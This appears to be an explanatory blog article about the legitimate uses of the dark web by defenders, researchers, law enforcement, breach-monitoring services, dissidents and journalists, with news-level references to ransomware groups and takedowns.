The term “dark web” may paint a picture in our head of threat actors lurking underground, on the shrouded parts of the internet where illicit activity and cybercrime thrive. What has come to be known as the dark web, however, has multifaceted use cases. It is also frequented by entities including gray hats, cyber defenders, data breach monitoring services and researchers.
The fact that this hidden network of websites and users offers a greater degree of anonymity and is not indexed by traditional search engines means that not only threat actors, but also political dissidents, meaning to conceal their identity and whereabouts, may benefit from it.
Here are some of the ways that ethical hackers, defenders, and real-world protagonists use the dark web.
Gathering threat intelligence
Any cybersecurity researcher and open-source intelligence (OSINT) analyst would be aware of the value sought from monitoring dark web feeds for threat intelligence.
Frequenting hacker forums or certain .onion sites, accessible only via Tor, may provide insight into threat actors and their evolving tactics, techniques, and procedures (TTPs), as well as the groups they belong to. The latter part is especially vital as some cybercriminals in the underground may belong to multiple ransomware or data extortion groups. For example, a threat actor group may pose solely as an initial access broker (IAB) and sell access to breached corporate networks or assets to individual ransomware or data extortion groups while being directly associated with any or none of these buyers.
Another key aspect of threat intel gathering is looking for upcoming attacks, vulnerability exploits, zero days, phishing toolkits, and newer malware strains circulating from time to time. For example, in the past, creators of the notorious Raccoon Stealer info-stealing malware have announced releases of stealthier variants on hacker forums. While at first glance, these posts may appear to be targeted at and be valuable to threat actors and script kiddies (skids), antivirus companies can quickly build signature-based detections into their products for these newer variants, thereby safeguarding home and corporate users.
SOC analysts and researchers can also dissect and study newer strains to write YARA and Sigma rules to protect organisational networks from novel threats. Researchers in both academia and industry can gain insight into how network flows can be monitored for up-and-coming stealthy exploits and viruses that are harder to detect via conventional means. Keeping tabs on the ever-evolving underground cybercrime scene can help security vendors enrich their defensive technologies and product offerings.
Attributing attacks to threat actors
When organizations suffer from data breaches and cyber incidents, the dark web becomes a crucial tool for defenders, including the impacted businesses, their legal teams, and negotiators.
Threat actors such as ransomware groups often attack organizations to encrypt and steal their data so they can extort them for money, in exchange for a decryption key. To gain leverage during negotiations or should the organization outright refuse to pay a ransom, threat actors often start leaking stolen data on their .onion leak sites in small batches, gradually exposing sensitive customer and employee information, including copies of passports, identification documents, protected healthcare data, and financial records to the public. Other threat actors may also put up the larger multi-gigabyte data dumps for sale on hacker forums from which identity thieves and phishing actors can benefit.
For the impacted organization, the dark web becomes a vital means to monitor the extent of damage: what information has been publicly exposed, on what forums or online groups, who (or which threat actor group), if anyone, has claimed responsibility for the attack, and how stolen assets are being disseminated (i.e. being sold for profit or outright leaked for free). Often, .onion sites and Telegram groups may be the sole links between an impacted organization’s defenders and the threat actor(s), serving as primary communication channel, as evidenced by leaked negotiation chats between Royal Mail and the LockBit ransomware group during the 2023 cyber attack.
Attribution becomes especially important when an obvious motive, like monetary gain or ransom, is missing. Hacktivist groups, for example, may target a website or government systems with large-scale Distributed Denial of Service (DDoS) attacks, knocking them offline, or some vigilante software authors may intentionally sabotage their work to cause damage to systems located in certain parts of the world – all to draw attention to their wider message rather than financial gain.
Monitoring for data leaks and breaches
Data breach monitoring services like HaveIBeenPwned (HIBP) frequently keep track of leaked data dumps surfacing on the dark web and in hacker forums. Users can check if their information was compromised in a data breach simply by entering their email address on HIBP, at no cost.
Search engines such as Intelligence X specialise in enabling researchers and defenders to look up crucial bits of information, such as a cryptocurrency wallet address, IPs, domains, or email addresses, found in public data leaks and the darknet.
In a consumer context, dark web monitoring has recently gained prominence in the form of fraud and identity theft monitoring plans offered by leading credit reporting bureaus like TransUnion, Equifax, and Experian.
Users initially create a profile with a credit bureau after verifying their identity by answering questions online, solutions to which are already known to the bureau, given the historical lending data they hold about consumers. After successful enrolment in a paid subscription, users can opt to record their sensitive information, such as credit card numbers, driving license information, passport and travel document data, and taxpayer identification numbers like National Insurance Number (NINo), Social Security Number (SSN), and Social Insurance Number (SINs) on the bureau’s website. This information, stored securely, is periodically checked against leaked data emerging on the dark web, such as breached company databases surfacing in the wild.
The idea is that any time there is a hit for a piece of the recorded data against an illicit data dump floating on the dark web, the enrolled victim would be notified and can become aware of potential identity theft they may be subject to.
Bypassing censorship and whistleblowing
Dark web and technologies like Tor, Telegram, or VPNs may also be relied on by whistleblowers in jurisdictions where internet use is restricted or heavily scrutinized.
Political dissidents and defenders of civil liberties who want to raise their voice without compromising their identity or location may opt to use the dark web to disseminate their message or disclose evidence of corporate or governmental wrongdoing, for example. While these actions may be of questionable legality and ethics, they demonstrate the complex nuances of these technologies and the wider “dark web,” which isn’t inherently “bad.”
Technologies like VPNs can allow users to access restricted apps and websites, such as LGBTQ+ social networks, in countries where they are censored. News websites, like The Guardian, often have an .onion version with identical content. Should the main outlet website be banned by an authoritarian regime, citizens can still rely on Tor to access the outlet with a greater degree of anonymity.
Enforcing the law
If criminals can lurk on the dark web, so can and do the police.
Government law enforcement agencies like the FBI, Interpol and the Australia Federal Police are frequently credited with taking down widespread cybercrime operations. Recently, these have involved the FBI and several other law enforcement agencies from different countries cracking down on a counter-antivirus operation, “AVCheck,” and crushing the Lumma Stealer malware-as-a-service (MaaS) that stole millions of passwords.
Beyond seizing illicit domains and nuking ransomware operations, federal agencies have employed the dark web to target drug traffickers and criminals behind CSAM. A recent example would be Operation RapTor, in which law enforcement agencies across the US, Europe, South America, and Asia collaborated to arrest 270 dark web vendors, buyers, and admins associated with illegal fentanyl and opioid trade.
Research and journalism
Less obvious but paramount use cases of the dark web include the value it provides to investigative journalists.
To reporters, the dark web provides an interesting avenue for extensive corroboration between parties and observing developments “behind the scenes,” particularly during high-profile cyber attacks. The anonymized communication channels and leak sites may serve as a conduit between reporters and threat actors who claim to be behind data breaches. While it’d be naïve to take the word of a threat actor at face value, the information about an attack or potential evidence shared by a threat actor may help a journalist vet how credible the claims made by the threat actor and the impacted organization are. This exercise can be particularly crucial for independent reporting in cases involving corporate wrongdoing, such as when an organization may wilfully try to cover up or downplay a security breach from stockholders and customers, despite ample evidence indicating the opposite, on a balance of probabilities. Other times, a company may not disclose a cyber incident at all. Still, the chatter on dark web and ransomware leak sites might enable researchers, the public, and journalists to ask important questions.
No Responses